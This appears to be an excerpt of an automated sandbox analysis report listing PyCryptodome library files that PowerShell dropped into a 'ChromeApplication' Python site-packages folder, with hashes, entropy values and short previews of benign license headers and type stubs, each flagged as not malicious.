                                                                                                                                                                                                  SSDEEP:24:1RE2C19+14f+161z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hy+1w+1KcJoNRL9UfEIL/LWStrYdB
                                                                                                                                                                                                  MD5:38E9FC3517817B876019A478AB882734
                                                                                                                                                                                                  SHA1:34493501A5A5AE3C744CBAC46BAEA8C2F276B08B
                                                                                                                                                                                                  SHA-256:BB3A920B06532D4AA7363F205556243F2B71014E1FA0851DE64840CD26C9AD50
                                                                                                                                                                                                  SHA-512:6E003672E1F2B603325A57C66F59C0C1487243D5FC738A809FF04960C5A675AE3E68DCF0BB101CC00944DFB80FFBAF1869DA02CB8D46AD92841E9A9330689F6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\PKCS1_PSS.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2154
                                                                                                                                                                                                  Entropy (8bit):5.295272514709387
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs0+mETupY34KepRG1:MwDqrYJALrYJHdt3EHGuI9DjYA3G1
                                                                                                                                                                                                  MD5:C9AD0C720C157C21F0BDE59A9C570978
                                                                                                                                                                                                  SHA1:08AD968BE36D338E46DBB26BF8F74508451FA359
                                                                                                                                                                                                  SHA-256:B54B24BE5330B4EB23A8D0BEF242BD785DFB0F1B31DCBACEB87AF47B73DB5A32
                                                                                                                                                                                                  SHA-512:79292C6608760748C9030C0C7DEEA4F600A7480AEE20290F5F9E9C55A0162F9C3A014CCD4090694DBAD8322C7FB000813D97DDC9DD7F7E88EBEBBDEDA189AF14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\PKCS1_PSS.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):895
                                                                                                                                                                                                  Entropy (8bit):5.021175970297132
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                                                                                  MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                                                                                  SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                                                                                  SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                                                                                  SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\PKCS1_v1_5.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2042
                                                                                                                                                                                                  Entropy (8bit):5.32432696462352
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIH20+8bETupt3Tk2dRGM:MwDqrYJALrYJHdt3EHGuIjRjtPGM
                                                                                                                                                                                                  MD5:7D8BF8D0C4889A5BF6BB4EB95AA44466
                                                                                                                                                                                                  SHA1:06633D6A4637773198A481EAB9ED156591DB7932
                                                                                                                                                                                                  SHA-256:0653BE50072749B16247CBB4905BB79FBD877FFC93F51C5B3E59EDC5FEB48E07
                                                                                                                                                                                                  SHA-512:68B95CBC4A39638FB7462DC391A145EC115BA045F301FEC54A475D134E5A3C93ED3223DD06C8895D2916294FB09A2A54B6D666307053F1AFC443AAF879267806
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\PKCS1_v1_5.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467
                                                                                                                                                                                                  Entropy (8bit):4.916093935652459
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                                                                                  MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                                                                                  SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                                                                                  SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                                                                                  SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1731
                                                                                                                                                                                                  Entropy (8bit):5.278283491953278
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHQ+t1v:MwDqrYJALrYJHdt3EHGuIT
                                                                                                                                                                                                  MD5:60FAD4E2C2EF2BA9BC88934491AB89F8
                                                                                                                                                                                                  SHA1:45D630681807B431E6A26BF1438B4A477F07BE74
                                                                                                                                                                                                  SHA-256:2567D9DADE66C8CE9981C1B3856398708FFF5037E6ABBF4C0A9D60AFBD1E8678
                                                                                                                                                                                                  SHA-512:DDF73D98249043EB96E57121447EAEABB54E31DD35ACEC319FA7195B9DBC03D1B914E4014A023CB5ADC01F5DCB9C981ADF4F962EFAF011B723EC1F6C47CE5D10
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\eddsa.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12758
                                                                                                                                                                                                  Entropy (8bit):4.953249726457768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6qrskrs9t3q/IVQVluiDVluYQu1s1NuMMMt:Frskrs9VqMlB1L
                                                                                                                                                                                                  MD5:0A4AF23CD5DF55B2C6E57D27689FCD5C
                                                                                                                                                                                                  SHA1:EAC0752A6E323C8A7EEB4D740268364526422DB5
                                                                                                                                                                                                  SHA-256:2DC65C619AFC2F1F5D170FA8FC67998B78FEB6ECC9EA4A3375AFE3C10AB37348
                                                                                                                                                                                                  SHA-512:E540382C6CCBACA754AED2B9F9A0D90938A37A00ED27B3829AD69B6089EC267767BEEB10968FD30BA7CBA586E20EB2DA6FE5D5ABC69AFA77AFE935C5D2D3482B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\eddsa.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):747
                                                                                                                                                                                                  Entropy (8bit):4.991320777959256
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                                                                                  MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                                                                                  SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                                                                                  SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
                                                                                                                                                                                                  SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\pkcs1_15.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9088
                                                                                                                                                                                                  Entropy (8bit):5.053423261865839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/ISM97UQFA2CEkoA3KhNzYaomc:0rskrs9VqdM97UQFAM+go
                                                                                                                                                                                                  MD5:8DD798B530CC55801BC2744A469CD46F
                                                                                                                                                                                                  SHA1:70FBA1485270D0F63B5C676B2AFC0CCAF606A06F
                                                                                                                                                                                                  SHA-256:2E59C1BB1C7A738F51343213C94F49503CB91BAD07D906272FA44BCC1CEDD8FA
                                                                                                                                                                                                  SHA-512:82DBDDC02494535B90B4388ED6698CBC4F90A0589B32A5D693C8134BF682007896E47C0055C222FE89260AF21CE8E0D4F639CEE61F02677893BD82937C310173
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\pkcs1_15.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):581
                                                                                                                                                                                                  Entropy (8bit):5.067047688730709
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                                                                                  MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                                                                                  SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                                                                                  SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                                                                                  SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\pss.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13970
                                                                                                                                                                                                  Entropy (8bit):4.861341757640308
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IFlYlgXJ0rcUfsOg58VFJbAVFtn3sxliqu8:0rskrs9Vq+GgXirHfsv8VEVP8/RL
                                                                                                                                                                                                  MD5:2A9F316CD479BB56AE101218E1B96816
                                                                                                                                                                                                  SHA1:3E63E6B6F8D771082C7DFF39B827BBB55BDA5CA9
                                                                                                                                                                                                  SHA-256:47736BFBB2762DEA089BE962E283E1E1155C51A2280C1839F5494B5BA9B72973
                                                                                                                                                                                                  SHA-512:C0F595025D3C77DB448177FFFAEC7FFA82FC021F08A351E00644CCA0F1006B1D68B4D6D567D242D56040CB7180D8B69DDD592C9ED85D653C34F8CCA026DCB84D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Signature\pss.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1071
                                                                                                                                                                                                  Entropy (8bit):5.102431129383602
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                                                                                  MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                                                                                  SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                                                                                  SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                                                                                  SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\Counter.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3292
                                                                                                                                                                                                  Entropy (8bit):5.003098854081704
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                                  MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                                  SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                                  SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                                  SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\Counter.pyi

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                                                  Entropy (8bit):4.705947008789207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                                  MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                                  SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                                  SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                                  SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\Util\Padding.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4421
                                                                                                                                                                                                  Entropy (8bit):5.191112640865006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                                  MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                                  SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                                  SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                                  SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                                  Malicious:false
